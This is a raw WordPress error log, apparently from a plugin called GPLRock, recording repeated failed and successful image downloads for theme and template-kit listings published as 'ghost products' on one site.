https://meldwp.com/wp-content/uploads/algori-image-and-video-slider-pro-for-wordpress-gutenberg-23469.webp [04-Apr-2026 22:57:48 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: algori-image-and-video-slider-pro-for-wordpress-gutenberg [04-Apr-2026 22:57:48 UTC] GPLRock: Image download failed for product woocommerce-variation-swatches-images (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:57:50 UTC] GPLRock: Image download failed for product woocommerce-variation-swatches-images (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:57:52 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-variation-swatches-images-2792.webp for product woocommerce-variation-swatches-images after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:57:52 UTC] GPLRock: Image download failed for product woocommerce-variation-swatches-images (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:57:54 UTC] GPLRock: Image download failed for product woocommerce-variation-swatches-images (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:57:56 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-variation-swatches-images-2792.webp for product woocommerce-variation-swatches-images after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:57:56 UTC] GPLRock WARNING: Image download failed for product woocommerce-variation-swatches-images. URL: https://meldwp.com/wp-content/uploads/woocommerce-variation-swatches-images-2792.webp [04-Apr-2026 22:57:56 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-variation-swatches-images [04-Apr-2026 22:57:57 UTC] GPLRock: Image download failed for product wordpress-woocommerce-multi-vendor-marketplace-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:57:59 UTC] GPLRock: Image download failed for product wordpress-woocommerce-multi-vendor-marketplace-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:58:01 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wordpress-woocommerce-multi-vendor-marketplace-plugin-3056.webp for product wordpress-woocommerce-multi-vendor-marketplace-plugin after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:58:01 UTC] GPLRock: Image download failed for product wordpress-woocommerce-multi-vendor-marketplace-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:58:03 UTC] GPLRock: Image download failed for product wordpress-woocommerce-multi-vendor-marketplace-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:58:05 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wordpress-woocommerce-multi-vendor-marketplace-plugin-3056.webp for product wordpress-woocommerce-multi-vendor-marketplace-plugin after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:58:05 UTC] GPLRock WARNING: Image download failed for product wordpress-woocommerce-multi-vendor-marketplace-plugin. URL: https://meldwp.com/wp-content/uploads/wordpress-woocommerce-multi-vendor-marketplace-plugin-3056.webp [04-Apr-2026 22:58:05 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wordpress-woocommerce-multi-vendor-marketplace-plugin [04-Apr-2026 22:58:05 UTC] GPLRock: Image download failed for product edd-advanced-permalinks (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:58:07 UTC] GPLRock: Image download failed for product edd-advanced-permalinks (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:58:09 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/edd-advanced-permalinks-32327.webp for product edd-advanced-permalinks after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:58:10 UTC] GPLRock: Image download failed for product edd-advanced-permalinks (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:58:12 UTC] GPLRock: Image download failed for product edd-advanced-permalinks (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:58:14 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/edd-advanced-permalinks-32327.webp for product edd-advanced-permalinks after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:58:14 UTC] GPLRock WARNING: Image download failed for product edd-advanced-permalinks. URL: https://meldwp.com/wp-content/uploads/edd-advanced-permalinks-32327.webp [04-Apr-2026 22:58:14 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: edd-advanced-permalinks [04-Apr-2026 22:58:14 UTC] GPLRock: Image download failed for product soundcloud-music-charts-with-2-custom-skin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:58:16 UTC] GPLRock: Image download failed for product soundcloud-music-charts-with-2-custom-skin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:58:18 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/soundcloud-music-charts-with-2-custom-skin-4914.webp for product soundcloud-music-charts-with-2-custom-skin after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:58:18 UTC] GPLRock: Image download failed for product soundcloud-music-charts-with-2-custom-skin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:58:20 UTC] GPLRock: Image download failed for product soundcloud-music-charts-with-2-custom-skin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:58:22 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/soundcloud-music-charts-with-2-custom-skin-4914.webp for product soundcloud-music-charts-with-2-custom-skin after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:58:22 UTC] GPLRock WARNING: Image download failed for product soundcloud-music-charts-with-2-custom-skin. URL: https://meldwp.com/wp-content/uploads/soundcloud-music-charts-with-2-custom-skin-4914.webp [04-Apr-2026 22:58:23 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: soundcloud-music-charts-with-2-custom-skin [04-Apr-2026 22:58:33 UTC] GPLRock: Image download failed for product magic-answers-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:58:35 UTC] GPLRock: Image download failed for product magic-answers-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:58:37 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/magic-answers-plugin-12477.webp for product magic-answers-plugin after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:58:37 UTC] GPLRock: Image download failed for product magic-answers-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:58:39 UTC] GPLRock: Image download failed for product magic-answers-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:58:41 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/magic-answers-plugin-12477.webp for product magic-answers-plugin after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:58:41 UTC] GPLRock WARNING: Image download failed for product magic-answers-plugin. URL: https://meldwp.com/wp-content/uploads/magic-answers-plugin-12477.webp [04-Apr-2026 22:58:41 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: magic-answers-plugin [04-Apr-2026 22:58:41 UTC] GPLRock: Image download failed for product custom-scrollbar-revamp-scrollbars-to-match-your-websites-aesthetic (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:58:44 UTC] GPLRock: Image download failed for product custom-scrollbar-revamp-scrollbars-to-match-your-websites-aesthetic (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:58:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/custom-scrollbar--revamp-scrollbars-to-match-your-websites-aesthetic-19329.webp for product custom-scrollbar-revamp-scrollbars-to-match-your-websites-aesthetic after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:58:46 UTC] GPLRock: Image download failed for product custom-scrollbar-revamp-scrollbars-to-match-your-websites-aesthetic (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:58:48 UTC] GPLRock: Image download failed for product custom-scrollbar-revamp-scrollbars-to-match-your-websites-aesthetic (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:58:50 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/custom-scrollbar--revamp-scrollbars-to-match-your-websites-aesthetic-19329.webp for product custom-scrollbar-revamp-scrollbars-to-match-your-websites-aesthetic after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:58:50 UTC] GPLRock WARNING: Image download failed for product custom-scrollbar-revamp-scrollbars-to-match-your-websites-aesthetic. URL: https://meldwp.com/wp-content/uploads/custom-scrollbar--revamp-scrollbars-to-match-your-websites-aesthetic-19329.webp [04-Apr-2026 22:58:50 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: custom-scrollbar-revamp-scrollbars-to-match-your-websites-aesthetic [04-Apr-2026 22:59:06 UTC] GPLRock: Image downloaded successfully for product pestco-pest-control-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4db4c8e3.webp [04-Apr-2026 22:59:06 UTC] GPLRock: Using pre-downloaded image for product pestco-pest-control-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4db4c8e3.webp [04-Apr-2026 22:59:06 UTC] GPLRock: Ghost product published with image - Product ID: pestco-pest-control-elementor-template-kit [04-Apr-2026 22:59:07 UTC] GPLRock: Image downloaded successfully for product payloan-banking-business-loan-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-cfb9636f.webp [04-Apr-2026 22:59:07 UTC] GPLRock: Using pre-downloaded image for product payloan-banking-business-loan-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-cfb9636f.webp [04-Apr-2026 22:59:07 UTC] GPLRock: Ghost product published with image - Product ID: payloan-banking-business-loan-elementor-template-kit [04-Apr-2026 22:59:09 UTC] GPLRock: Image downloaded successfully for product partiso-political-party-candidate-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d7b5bf9c.webp [04-Apr-2026 22:59:09 UTC] GPLRock: Using pre-downloaded image for product partiso-political-party-candidate-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d7b5bf9c.webp [04-Apr-2026 22:59:09 UTC] GPLRock: Ghost product published with image - Product ID: partiso-political-party-candidate-elementor-template-kit [04-Apr-2026 22:59:10 UTC] GPLRock: Image downloaded successfully for product ozeum-modern-art-gallery-museum-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d7df1510.webp [04-Apr-2026 22:59:10 UTC] GPLRock: Using pre-downloaded image for product ozeum-modern-art-gallery-museum-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d7df1510.webp [04-Apr-2026 22:59:10 UTC] GPLRock: Ghost product published with image - Product ID: ozeum-modern-art-gallery-museum-elementor-template-kit [04-Apr-2026 22:59:12 UTC] GPLRock: Image downloaded successfully for product otmil-diet-clean-food-catering-services-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-97e77624.webp [04-Apr-2026 22:59:12 UTC] GPLRock: Using pre-downloaded image for product otmil-diet-clean-food-catering-services-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-97e77624.webp [04-Apr-2026 22:59:12 UTC] GPLRock: Ghost product published with image - Product ID: otmil-diet-clean-food-catering-services-elementor-template-kit [04-Apr-2026 22:59:14 UTC] GPLRock: Image downloaded successfully for product optica-optometrist-eye-care-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-31bc10fb.jpg [04-Apr-2026 22:59:14 UTC] GPLRock: Using pre-downloaded image for product optica-optometrist-eye-care-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-31bc10fb.jpg [04-Apr-2026 22:59:14 UTC] GPLRock: Ghost product published with image - Product ID: optica-optometrist-eye-care-elementor-template-kit [04-Apr-2026 22:59:15 UTC] GPLRock: Image downloaded successfully for product onetrav-travel-agency-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d6fb3455.webp [04-Apr-2026 22:59:15 UTC] GPLRock: Using pre-downloaded image for product onetrav-travel-agency-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d6fb3455.webp [04-Apr-2026 22:59:16 UTC] GPLRock: Ghost product published with image - Product ID: onetrav-travel-agency-elementor-template-kit [04-Apr-2026 22:59:17 UTC] GPLRock: Image downloaded successfully for product obra-kids-education-school-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5c040fdd.webp [04-Apr-2026 22:59:17 UTC] GPLRock: Using pre-downloaded image for product obra-kids-education-school-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5c040fdd.webp [04-Apr-2026 22:59:17 UTC] GPLRock: Ghost product published with image - Product ID: obra-kids-education-school-template-kit [04-Apr-2026 22:59:18 UTC] GPLRock: Image downloaded successfully for product novely-book-store-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ec2cdb04.webp [04-Apr-2026 22:59:18 UTC] GPLRock: Using pre-downloaded image for product novely-book-store-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ec2cdb04.webp [04-Apr-2026 22:59:19 UTC] GPLRock: Ghost product published with image - Product ID: novely-book-store-elementor-template-kit [04-Apr-2026 22:59:20 UTC] GPLRock: Image downloaded successfully for product netric-proxy-vpn-services-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7590f566.jpg [04-Apr-2026 22:59:20 UTC] GPLRock: Using pre-downloaded image for product netric-proxy-vpn-services-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7590f566.jpg [04-Apr-2026 22:59:20 UTC] GPLRock: Ghost product published with image - Product ID: netric-proxy-vpn-services-elementor-template-kit [04-Apr-2026 23:00:18 UTC] GPLRock: Image download failed for product seniman-modern-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:00:20 UTC] GPLRock: Image download failed for product seniman-modern-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:00:22 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/seniman--modern-portfolio-wordpress-theme-4850.webp for product seniman-modern-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:00:22 UTC] GPLRock: Image download failed for product seniman-modern-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:00:25 UTC] GPLRock: Image download failed for product seniman-modern-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:00:27 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/seniman--modern-portfolio-wordpress-theme-4850.webp for product seniman-modern-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:00:27 UTC] GPLRock WARNING: Image download failed for product seniman-modern-portfolio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/seniman--modern-portfolio-wordpress-theme-4850.webp [04-Apr-2026 23:00:27 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: seniman-modern-portfolio-wordpress-theme [04-Apr-2026 23:00:27 UTC] GPLRock: Image download failed for product evisa-immigration-and-visa-consulting-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:00:29 UTC] GPLRock: Image download failed for product evisa-immigration-and-visa-consulting-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:00:31 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/evisa---immigration-and-visa-consulting-wordpress-theme-23503.webp for product evisa-immigration-and-visa-consulting-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:00:31 UTC] GPLRock: Image download failed for product evisa-immigration-and-visa-consulting-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:00:33 UTC] GPLRock: Image download failed for product evisa-immigration-and-visa-consulting-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:00:35 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/evisa---immigration-and-visa-consulting-wordpress-theme-23503.webp for product evisa-immigration-and-visa-consulting-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:00:35 UTC] GPLRock WARNING: Image download failed for product evisa-immigration-and-visa-consulting-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/evisa---immigration-and-visa-consulting-wordpress-theme-23503.webp [04-Apr-2026 23:00:35 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: evisa-immigration-and-visa-consulting-wordpress-theme [04-Apr-2026 23:00:36 UTC] GPLRock: Image download failed for product nazareth-church-religion-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:00:38 UTC] GPLRock: Image download failed for product nazareth-church-religion-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:00:40 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/nazareth--church--religion-wordpress-theme-4554.webp for product nazareth-church-religion-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:00:40 UTC] GPLRock: Image download failed for product nazareth-church-religion-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:00:42 UTC] GPLRock: Image download failed for product nazareth-church-religion-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:00:44 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/nazareth--church--religion-wordpress-theme-4554.webp for product nazareth-church-religion-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:00:44 UTC] GPLRock WARNING: Image download failed for product nazareth-church-religion-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/nazareth--church--religion-wordpress-theme-4554.webp [04-Apr-2026 23:00:44 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: nazareth-church-religion-wordpress-theme [04-Apr-2026 23:00:44 UTC] GPLRock: Image download failed for product the-outset-multipurpose-wordpress-theme-for-saas-startup (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:00:46 UTC] GPLRock: Image download failed for product the-outset-multipurpose-wordpress-theme-for-saas-startup (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:00:48 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/the-outset---multipurpose-wordpress-theme-for-saas--startup-25660.webp for product the-outset-multipurpose-wordpress-theme-for-saas-startup after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:00:49 UTC] GPLRock: Image download failed for product the-outset-multipurpose-wordpress-theme-for-saas-startup (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:00:51 UTC] GPLRock: Image download failed for product the-outset-multipurpose-wordpress-theme-for-saas-startup (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:00:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/the-outset---multipurpose-wordpress-theme-for-saas--startup-25660.webp for product the-outset-multipurpose-wordpress-theme-for-saas-startup after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:00:53 UTC] GPLRock WARNING: Image download failed for product the-outset-multipurpose-wordpress-theme-for-saas-startup. URL: https://meldwp.com/wp-content/uploads/the-outset---multipurpose-wordpress-theme-for-saas--startup-25660.webp [04-Apr-2026 23:00:53 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: the-outset-multipurpose-wordpress-theme-for-saas-startup [04-Apr-2026 23:00:53 UTC] GPLRock: Image downloaded successfully for product tacticool-shooting-range-gun-store-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4353bbdf.webp [04-Apr-2026 23:00:53 UTC] GPLRock: Using pre-downloaded image for product tacticool-shooting-range-gun-store-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4353bbdf.webp [04-Apr-2026 23:00:53 UTC] GPLRock: Ghost product published with image - Product ID: tacticool-shooting-range-gun-store-wordpress-theme [04-Apr-2026 23:00:53 UTC] GPLRock: Image download failed for product captiva-responsive-wordpress-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:00:55 UTC] GPLRock: Image download failed for product captiva-responsive-wordpress-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:00:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/captiva---responsive-wordpress-woocommerce-theme-32399.webp for product captiva-responsive-wordpress-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:00:58 UTC] GPLRock: Image download failed for product captiva-responsive-wordpress-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:01:00 UTC] GPLRock: Image download failed for product captiva-responsive-wordpress-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:01:03 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/captiva---responsive-wordpress-woocommerce-theme-32399.webp for product captiva-responsive-wordpress-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:01:03 UTC] GPLRock WARNING: Image download failed for product captiva-responsive-wordpress-woocommerce-theme. URL: https://meldwp.com/wp-content/uploads/captiva---responsive-wordpress-woocommerce-theme-32399.webp [04-Apr-2026 23:01:03 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: captiva-responsive-wordpress-woocommerce-theme [04-Apr-2026 23:01:03 UTC] GPLRock: Image download failed for product helpo-charity-nonprofit-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:01:05 UTC] GPLRock: Image download failed for product helpo-charity-nonprofit-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:01:07 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/helpo--charity--nonprofit-wordpress-theme-9240.webp for product helpo-charity-nonprofit-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:01:07 UTC] GPLRock: Image download failed for product helpo-charity-nonprofit-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:01:09 UTC] GPLRock: Image download failed for product helpo-charity-nonprofit-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:01:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/helpo--charity--nonprofit-wordpress-theme-9240.webp for product helpo-charity-nonprofit-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:01:12 UTC] GPLRock WARNING: Image download failed for product helpo-charity-nonprofit-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/helpo--charity--nonprofit-wordpress-theme-9240.webp [04-Apr-2026 23:01:12 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: helpo-charity-nonprofit-wordpress-theme [04-Apr-2026 23:01:12 UTC] GPLRock: Image download failed for product fabzy-wp-fashion-and-multi-purpose-elementor-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:01:14 UTC] GPLRock: Image download failed for product fabzy-wp-fashion-and-multi-purpose-elementor-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:01:16 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/fabzy-wp---fashion-and-multi-purpose-elementor-woocommerce-theme-6318.webp for product fabzy-wp-fashion-and-multi-purpose-elementor-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:01:16 UTC] GPLRock: Image download failed for product fabzy-wp-fashion-and-multi-purpose-elementor-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:01:18 UTC] GPLRock: Image download failed for product fabzy-wp-fashion-and-multi-purpose-elementor-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:01:20 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/fabzy-wp---fashion-and-multi-purpose-elementor-woocommerce-theme-6318.webp for product fabzy-wp-fashion-and-multi-purpose-elementor-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:01:20 UTC] GPLRock WARNING: Image download failed for product fabzy-wp-fashion-and-multi-purpose-elementor-woocommerce-theme. URL: https://meldwp.com/wp-content/uploads/fabzy-wp---fashion-and-multi-purpose-elementor-woocommerce-theme-6318.webp [04-Apr-2026 23:01:20 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: fabzy-wp-fashion-and-multi-purpose-elementor-woocommerce-theme [04-Apr-2026 23:01:21 UTC] GPLRock: Image download failed for product advice-psychology-therapy-counseling-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:01:23 UTC] GPLRock: Image download failed for product advice-psychology-therapy-counseling-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:01:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/advice---psychology-therapy--counseling-theme-11061.webp for product advice-psychology-therapy-counseling-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:01:25 UTC] GPLRock: Image download failed for product advice-psychology-therapy-counseling-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:01:27 UTC] GPLRock: Image download failed for product advice-psychology-therapy-counseling-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:01:29 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/advice---psychology-therapy--counseling-theme-11061.webp for product advice-psychology-therapy-counseling-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:01:29 UTC] GPLRock WARNING: Image download failed for product advice-psychology-therapy-counseling-theme. URL: https://meldwp.com/wp-content/uploads/advice---psychology-therapy--counseling-theme-11061.webp [04-Apr-2026 23:01:29 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: advice-psychology-therapy-counseling-theme [04-Apr-2026 23:01:29 UTC] GPLRock: Image downloaded successfully for product pesce-seafood-restaurant-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-233b2074.webp [04-Apr-2026 23:01:29 UTC] GPLRock: Using pre-downloaded image for product pesce-seafood-restaurant-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-233b2074.webp [04-Apr-2026 23:01:29 UTC] GPLRock: Ghost product published with image - Product ID: pesce-seafood-restaurant-wordpress-theme [04-Apr-2026 23:01:48 UTC] GPLRock: Image downloaded successfully for product bazso-barbershop-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-87703d60.webp [04-Apr-2026 23:01:48 UTC] GPLRock: Using pre-downloaded image for product bazso-barbershop-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-87703d60.webp [04-Apr-2026 23:01:48 UTC] GPLRock: Ghost product published with image - Product ID: bazso-barbershop-elementor-template-kit [04-Apr-2026 23:01:49 UTC] GPLRock: Image downloaded successfully for product baxter-creative-agency-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-da0787a3.webp [04-Apr-2026 23:01:49 UTC] GPLRock: Using pre-downloaded image for product baxter-creative-agency-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-da0787a3.webp [04-Apr-2026 23:01:49 UTC] GPLRock: Ghost product published with image - Product ID: baxter-creative-agency-elementor-template-kit [04-Apr-2026 23:01:51 UTC] GPLRock: Image downloaded successfully for product barley-blog-magazine-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-23fa9821.jpg [04-Apr-2026 23:01:51 UTC] GPLRock: Using pre-downloaded image for product barley-blog-magazine-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-23fa9821.jpg [04-Apr-2026 23:01:51 UTC] GPLRock: Ghost product published with image - Product ID: barley-blog-magazine-elementor-template-kit [04-Apr-2026 23:01:52 UTC] 